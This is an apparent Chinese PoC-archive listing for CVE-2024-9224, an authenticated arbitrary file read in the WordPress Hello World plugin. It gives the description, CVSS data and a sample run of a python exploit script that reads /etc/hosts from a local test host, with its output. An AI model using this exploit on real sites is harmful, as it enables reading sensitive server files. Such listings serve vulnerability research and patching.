关联漏洞
描述
Hello World <= 2.1.1 - Authenticated (Subscriber+) Arbitrary File Read
介绍
# CVE-2024-9224
Hello World <= 2.1.1 - Authenticated (Subscriber+) Arbitrary File Read
# Description
The Hello World plugin for WordPress is vulnerable to Arbitrary File Reading in all versions up to, and including, 2.1.1 via the hello_world_lyric() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
# Info
```
Published: 2024-09-30 00:00:00
CVE: CVE-2024-9224
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 6.5
Slugs: hello-world
```
# Notes
It only displays a small part of the text file.
# POC
```
python3 CVE-2024-9224.py -un user -p user --url http://kubernetes.docker.internal -f /etc/hosts
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
Nonce value: 0dbe58cb8d
Extracted text: 127.0.0.1 localhost
```
文件快照
[4.0K] /data/pocs/17b040a2d850be1233bf7088265f68f782248b6e
├── [4.0K] CVE-2024-9224.py
└── [ 914] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。